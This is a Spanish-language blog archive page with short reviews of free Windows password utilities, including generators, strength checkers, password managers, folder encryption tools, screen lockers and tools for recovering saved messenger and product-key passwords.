Una vez que hayamos guardado cualquier texto en iLocker con nuestra contraseña, él nos dará un ID (número de identificación) con el cual podremos acceder al texto que hemos guardado. Así de fácil y sencillo significa trabajar con esta potente herramienta web.

Visto en GeeksRoom
Enlace web | iLocker


MakePassword: Generador online de contraseñas seguras…

MakePassword

Mucho se ha hablado sobre MakePassword, una potente utilidad online para generar contraseñas de alta seguridad y fiabilidad. A diferencia de Password Bird, que genera contraseñas basadas en palabras fáciles de recordar, que usemos frecuentemente.

Concretamente MakePassword no requiere de interacción por parte del usuario en cuanto a ingresar datos, como en el caso de Password Bird que tenías que ingresar un nombre, o una fecha de nacimiento, si no más bien ir seleccionando entre una serie de parámetros.

Parámetros como el número de caracteres de la contraseña, caracteres a usar (que si palabras en minúsculas o mayúsculas), símbolos (&$”!), números, exclusión de ciertos términos. Luego se te irán generando contraseñas aleatoriamente, cuantas quieras.

Los resultados de las contraseñas generadas por MakePassword puedes presentarlos en la misma página web como en un archivo CSV (para Excel, hoja de cálculo) o en texto plano. En definitiva, una opción más para tener la mejor y más segura contraseña.

Vía | Bitelia y Wwwhat’s New
Enlace web | MakePassword


Password Bird: Generador de contraseñas fáciles de recordar

Password Bird

Password Bird es un servicio web que nos sirve para generar contraseñas seguras pero que no son tan difíciles de recordar, o lo que es lo mismo, fáciles de recordar. El truco está en que tú provees palabras familiares para ti, y ésto lo hace “fácil para recordar”.

Concretamente puedes ingresar tu nombre (o el de una persona especial como tu pareja, o tu madre, o tu cantante favorito; el cuento es que no se te olvide), una palabra que sea especial para ti (por ejemplo para mí sería opensource, visualbasic, etc) y una fecha que consideres especial para ti (por ejemplo podría ser tu fecha de nacimiento), y listo.

Una vez que hayamos ingresado esos tres datos, Password Bird automáticamente nos va a generar una contraseña con esos datos. De esta manera tendremos una contraseña con palabras que están conjugadas entre sí, y que nos son mucho más familiares, amigos.

Vía | Genbeta y Wwwhat’s New
Enlace web | Password Bird


Messenger Key: Recupera clave de Yahoo, Google Talk o MSN

¿Recuerdan MessenPass? Una utilidad que tratamos el año pasado por aquí con la cual podemos recuperar las contraseñas del Messenger. Ahora vamos con Messenger Key, una herramienta que es similar, pero un poco más amplia en cuanto a soporte de redes.

Messenger Key

Messenger Key es una utilidad gratuita para Windows con la cual recuperar claves de las redes de mensajería instantánea más populares en la actualidad, tales como: Windows Live Messenger (o MSN Messenger), Google Talk, Yahoo! Messenger y de ICQ.

El programa requiere de una sencilla instalación. Una vez hayamos instalado el programa, lo ejecutamos y elegimos de qué red de mensajería instantánea queremos recuperar las claves: luego, se nos listarán todas las contraseñas recuperables para la red escogida.

Aclaro que, para poder recuperar las contraseñas con Messenger Key, es necesario que el usuario haya marcado la opción “Guardar contraseña” en el cliente de mensajería instantánea, porque de lo contrario, el programa no podrá hacer nada en dicho caso.

Sitio oficial | Messenger Key
Descargar Messenger Key


Password Meter: ¿Qué tan seguras son tus contraseñas?

Password Meter

Probablemente ésta sea una de las preguntas que un internauta se hace a diario: ¿qué tan seguras son mis contraseñas? Y es que sin duda alguna que nuestras contraseñas son uno de los datos más importantes en nuestras vidas digitales. ¿Cómo saber su fortaleza? Ya vimos que con Password checker podíamos comprobar la seguridad de las mismas.

Ahora, si lo que queremos es un nivel más profesional y por supuesto, fiable, podemos usar otra utilidad vía web que me he conseguido cuyo nombre es Password Meter, que se distingue de Password checker en que es muchísimo más potente, completo y confiable.

¿Recuerdan que cuando estuvimos hablando de Password checker, para comprobar la fiabilidad de dicha aplicación web, implementamos la contraseña sIs83–3Xx–+Yx11? Si esa contraseña, que en aquella utilidad tenía alto nivel de seguridad, la metemos en esta aplicación web, nos arrojará como resultado Very Strong, es decir, la mejor :D

Sin duda alguna utilidades como Password Meter o Password checker son de esas que ya no se pueden pasar por alto a la hora de escoger una contraseña para cualquier cuenta que consideremos importante. Dicho esto, el resto depende de ti, estimado amigo.

Vía | Grupo Geek y Bitelia
Enlace web | Password Meter


Protégete de keyloggers en Windows con Neo’s SafeKeys

Neo’s SafeKeys

Habitualmente estamos expuestos a cientos de amenazas informáticas, y si manejamos contraseñas, claves, somos vulnerables a cualquier keylogger, que no es más que un programa que registra en un archivo de texto las teclas pulsadas en nuestro sistema.

Por supuesto que existen muchos métodos para protegernos de estos programas que son tan peligrosos. Una de las maneras es usando un teclado virtual, y es eso lo que es Neo’s SafeKeys, un teclado virtual para Windows con el cual aumentarás tu privacidad.

El funcionamiento de Neo’s SafeKeys es sencillo. Una vez que lo hayamos ejecutado (por cierto, es portátil, no requiere de instalación), anotamos la contraseña que como se ve, está también protegida con asteriscos. Luego podremos arrastrar dicha contraseña al formulario o campo de texto en el que queremos ingresar dicho dato privado.

Sitio oficial | Neo’s SafeKeys
Descargar Neo’s SafeKeys


Comprueba la seguridad de tus claves con Password checker

Password checker

Microsoft, como siempre de buena gente y pensando en la seguridad de sus usuarios, ha liberado hace un tiempo una utilidad cuyo nombre es Password checker, que trabaja de vía web, por lo cual se deduce es una aplicación web, con un claro objetivo.

El objetivo de Password checker es comprobar la seguridad de tus contraseñas, basándose en diversos algoritmos de seguridad. Como ves en la captura, ingresas la contraseña en una caja, y en tiempo real, va verificando la seguridad de la misma.

Según puedo experimentar, Password checker califica a una contraseña con el nivel máximo de seguridad cuando incluimos textos, números y símbolos: sIs83–3Xx–+Yx11. Si usas una contraseña como la que propuse, te recomiendo entonces que para que no se te olvide utilices Bytessence PassKeeper y así administras todas tus contraseñas.

Vía | Incubaweb y Download Squad
Enlace web | Password checker


Bytessence PassKeeper, gestiona tus contraseñas en Windows

Ayer les estuve hablando de Bytessence Install Maker, un programa para crear archivos de instalación a tus desarrollos de aplicaciones; hoy por hoy, vamos a hablar de un programa de los mismos creadores, Bytessence PassKeeper, para gestionar claves en Windows.

Bytessence PassKeeper

Bytessence PassKeeper (abreviado como BPK) es un completo sistema gratuito para Windows con el cual podremos gestionar nuestras contraseñas en Windows, sean las que sean, que si de cuentas de foros, correos electrónicos, servicios y en fin.

El programa en sí nos permite guardar y administrar nuestras contraseñas, mediante el uso de su interfaz visual que como pueden ver en la captura anterior es de lo más intuitiva. Además Bytessence PassKeeper nos permite una completa gestión grupal.

Todas las contraseñas gestionadas con Bytessence PassKeeper las puedes exportar en un fichero en formato HTML, cuenta con un generador de contraseñas y un medidor de seguridad de tus claves. Una herramienta bastante eficaz como ALPass.

Sitio oficial | Bytessence PassKeeper
Descargar Bytessence PassKeeper


FlashCrypt, otra opción para proteger datos con clave

Más sobre: Seguridad, Software

El tema de proteger carpetas en Windows XP ha dado mucho de qué hablar, y por esa razón es que me he visto en la obligación de tratar otras utilidades de la misma categoría, como es el caso de Folder Encryption, TrueCrypt o AxCrypt. Ahora vamos con FlashCrypt.

FlashCrypt

FlashCrypt es un programa gratuito para Windows con el cual tienes un completo sistema para la protección de ficheros y carpetas que consideras importantes para ti, mediante el uso de contraseñas, y de esa manera aislarlos de personas o usuarios indeseados.

El programa trabaja con 256-bit AES, un algoritmo para encriptar ficheros privados que está bastante difícil de saltar, así que en este sentido, ya vas viendo cómo las cosas no están tan complicadas, pues el programa te pone todo en bandeja de oro.

Por otro lado FlashCrypt ofrece una completa integración con Windows, sólo bastará dar un clic derecho al fichero o carpeta que quieres proteger y hacer otro clic en “Protect with FlashCrypt” y le estableces la contraseña. Además, puedes proteger dispositivos USB, CD-Roms, y opcionalmente te permite comprimir tus ficheros al protegerlos.

Sitio oficial | FlashCrypt
Descargar FlashCrypt

Etiquetas: , , , | 0

Folder Encryption, para proteger carpetas con claves

Hace días estuve hablando detalladamente sobre cómo proteger una carpeta en Windows XP, y es que, alternativas sobran. Con programas con Folder Lockbox o TrueCrypt podemos hacer esto. Ahora vamos con otra alternativa más llamada Folder Encryption.

Folder Encryption

Folder Encryption es un sencillo, práctico y excelente programa gratuito para Windows con el cual podremos proteger las carpetas y directorios que queramos para así aislar del alcance de miradas ajenas nuestros datos más íntimos e importantes.

El procedimiento para proteger una carpeta con Folder Encryption es sencillo. Bastará con ejecutar el programa, escoger la carpeta que queremos proteger y luego establecer la contraseña para la misma. Todo ésto bajo su interfaz intuitiva y sencilla de usar.

Por otro lado Folder Encryption nos permite proteger memorias portátiles (pendrives). Por cierto que las carpetas que están protegidas con el programa no pueden ser modificadas de ninguna manera (ni mover, ni copiar, ni eliminar, ni saber su tamaño real, etcétera). ¿Algo más fácil? No lo creo, pero bueno, cuestión de preferencias.

Sitio oficial | Folder Encryption
Descargar Folder Encryption


LockImage: Protegiendo imágenes con contraseñas

Androsa FileProtector es un programa del cual les estuve comentando hace más de un mes que cumple con la función de proteger ficheros con contraseñas en pocos pasos. Ahora vamos con uno más específico: uno que nos proteja imágenes con claves.

LockImage

Estamos hablando de LockImage, un programa que no requiere de instalación (es portátil) que nos ayuda en la tarea de proteger y cifrar imágenes con contraseñas para que estén fuera del alcance de algunos curiosos deseosos de husmearnos.

El proceso es fácil: abres el programa, seleccionas la imagen, estableces la contraseña y luego, LockImage te generará un fichero en formato EXE (un ejecutable) que al abrirlo te pedirá la contraseña que se ha establecido para dicha imagen.

Es sencillo, sí. Pero, cumple con lo que promete. A diferencia de otros programas que he probado, LockImage me ha parecido bastante bueno, bonito y barato; tal vez no ofrezca tanta funcionalidad, pero para lo que se creó este programa pues está muy bien.

Vía | Bitelia y DownloadSquad
Sitio oficial | LockImage
Descargar LockImage


ALPass, gestor de contraseñas gratuito y seguro

ALPassSi estás cansado de tener que estar escribiendo y escribiendo los usernames junto a las claves establecidas para hacer login en sitios, foros, cuentas de e-mail y pare de contar, tal vez lo que tú necesitas es un gestor de contraseñas. Ni tan lejos lo tienes pues ALPass es un excelente gestor y administrador de contraseñas gratuito para Windows con el cual podrás controlar todas tus contraseñas.

ALPass es un magnífico gestor de contraseñas y claves que funciona sobre Windows Vista y sus versiones precedentes. Se caracteriza, además de ser gratuito, por su interfaz de fácil manejo y por su algoritmo que aumenta la seguridad.

Además, ALPass te da la oportunidad de que crees infinitos logins con sus respectivas contraseñas, puedes encriptar tu información para mayor privacidad y seguridad, es portátil por lo que no requiere de instalación y lo puedes llevar adonde quieras.

Una función especial de ALPass es que puedes revelar lo que hay tras los asteríscos (******) en las contraseñas: algo adicional que complementa esta herramienta especial para que gestiones fácilmente todas tus contraseñas y cuentas electrónicas.

Visto en DosBit
Sitio oficial | ALPass
Descargar ALPass


Recupera la clave de tu sistema operativo con ProduKey

Si por alguna razón has perdido la clave de tu sistema operativo (sea cual sea, Windows XP, Windows 2000, etcétera) y la necesitas para instalar cualquier aplicación o lo que sea que fuere, una de las maneras es indagar en el registro del sistema, otra es ProduKey.

ProduKey

ProduKey es una diminuta utilidad para Windows que te revelará las claves para Windows (XP, 2000, 98, ME, etcétera) y Microsoft Office (XP, 2000, 2003, 2007, 97, etcétera) de manera automática. Desplegará un menú donde están todas las claves.

Por otra parte, ProduKey te permite generar un informe en formato HTML con todas las claves de tus productos de Windows. El programa no requiere de instalación alguna, tan sólo bastará con que lo ejecutes y listo, te mostrará todas las claves.

Vía | gHacks y PuntoGeek
Sitio oficial | ProduKey
Descargar ProduKey


Asterisk Logger, revela los asteriscos de tus contraseñas

Una de las maneras más comunes para ‘proteger’ nuestras contraseñas es esconderlas tras los famosos asteriscos de la siguiente manera: ********. Pero, ¿qué pasa cuando se nos olvida la contraseña? En muchos programas o formularios, existe la posibilidad de recordar las contraseñas. Pero, éstas se escoden tras los benditos asteriscos.

Asterisk Logger

Asterisk Logger es una simple utilidad gratuita para Windows que nos servirá para revelar las contraseñas que tras el camuflaje (los asteriscos: *******) están. De una forma muy fácil y rápida, obtendrás las claves que creías ya perdidas u olvidadas.

Una vez que ya hemos instalado Asterisk Logger y que lo ejecutemos, nos daremos cuenta que no es necesario interactuar con el programa: tan sólo bastará que lo ejecutemos para que él nos muestre las contraseñas guardadas en el sistema.

Algo que no se nos puede pasar por alto sobre Asterisk Logger es que el programa trabaja sólo con aplicaciones del sistema, más no con formularios o caché de navegadores web. En definitiva, una buena opción para los olvidadizos de la sala.

Sitio oficial | Asterisk Logger
Descargar Asterisk Logger


RoboForm2Go: Gestor gratuito de contraseñas

Si eres de los que tiene más de una cuenta de usuario en Internet, que si para un servicio de correo web, o para ese sitio web de compras, o para tu cuenta de en el proveedor de hospedaje, o lo que sea que fuere, RoboForm2Go es un programa para ti, amigo.

RoboForm2Go es un potente, gratuito, rápido y excelente gestor de contraseñas con características impresionantes; autocompletado, reconocimiento de formularios web, alto nivel de seguridad para salvaguardar todas tus contraseñas y muchísimo más.

RoboForm2Go

Continuar leyendo…


RockXP: Recupera o cambia la clave de tu Windows XP

En ciertas ocasiones tenemos que conseguir la clave de nuestro Windows XP, y hemos perdido la caja donde esta estaba. ¿Qué podemos hacer en estos casos? Es necesario recuperarla pues sin ella no podríamos instalar el sistema operativo de nuevo.

Tranquilo que RockXP es una práctica herramienta gratuita para Windows XP que te ayudará en la tarea de recuperar la clave (o contraseña) de Windows XP de una manera tan fácil que de seguro estarás agradecido con el creador de este programa gratuito.

RockXP

Continuar leyendo…


Androsa FileProtector: Proteger ficheros con contraseñas

La privacidad es un tema importante en la vida cotidiana, y no sólo en las computadoras necesitamos tener privacidad sino también en nuestros hogares o en donde sea. Si quieres proteger tus archivos con contraseñas, este programa es para ti.

Androsa FileProtector es uno de esos programas gratuitos que todavía no se conocen mucho, pero que merecen que se hable de ellos. Consiste en una utilidad con la que podemos proteger nuestros ficheros mediante contraseñas de forma fácil e intuitiva.

Androsa FileProtector

Continuar leyendo…


KeePass, gestiona tus contraseñas de manera segura

Ayer se estuvo hablando de AxCrypt que es un programa libre que te permite encriptar y proteger tus archivos más importantes con un solo clic. Pues bien, hoy les ofrezco un programa para complementar la seguridad y privacidad de tu PC.

KeePass es precisamente un programa libre que te permitirá gestionar tus contraseñas de manera intuitiva, el cual ofrece bajo una interfaz visual muy agradable y una estabilidad impresionante, y está organizado y divido por categorías. Muy interesante la aplicación.

KeePass

Continuar leyendo…


Matrix Screen Locker: Bloquea con contraseña el acceso al PC

Ayer les hablaba sobre Free Hide Folder, y para reforzar más la seguridad informática de nuestro ordenador, hoy les hablaré sobre una utilidad que también entrará en nuestra lista de programas favoritos para mantener la privacidad de nuestra PC.

Matrix Screen Locker es una interesante aplicación (¿o utilidad? ¿o salvapantallas? ¡lo que sea pero hace lo que debe hacer a la perfección!) que me he encontrado navegando por allí y que quisiera compartir con todos ustedes. Al estilo de Matrix :cool:

Matrix Screen Locker

Continuar leyendo…


MessenPass: Recuperar contraseñas del MSN Messenger

La mensajería instantánea es uno de los medios de comunicación vía Internet más populares en la actualidad. Alternativas existen, y cada red tiene su peculiaridad: MSN Messenger, Yahoo! Messenger, Jabber, ICQ, entre otros. Hay veces que la contraseña de nuestra cuenta se nos olvida, y deseamos recuperarla.

MessenPass es un programa que recupera contraseña del MSN Messenger, y de otros clientes de mensajería también como si fuera el caso de Yahoo! Messenger, Jabber, ICQ, entre otros. Bajo una interfaz automatizada, hace lo que debe hacer sin tantos rodeos.

MessenPass

Continuar leyendo…


Seguridad en Correos electrónicos

Cada vez existen más amenazas informáticas a las cuales estamos vulnerables de cualquier ataque o infección por la gran demanda de usuarios que hay actualmente en Internet. El correo electrónico (o e-mail) es un blanco estratégico para propagar todas esas amenazas informáticas a través de Internet.

Técnicas como el spam, phishing y hoax, son frecuentemente implementadas para aprovecharse de la inocencia o desconocimiento de algunos.

Correos electrónicos

Continuar leyendo…


Powered by Bad Robot
Helped by Blackubay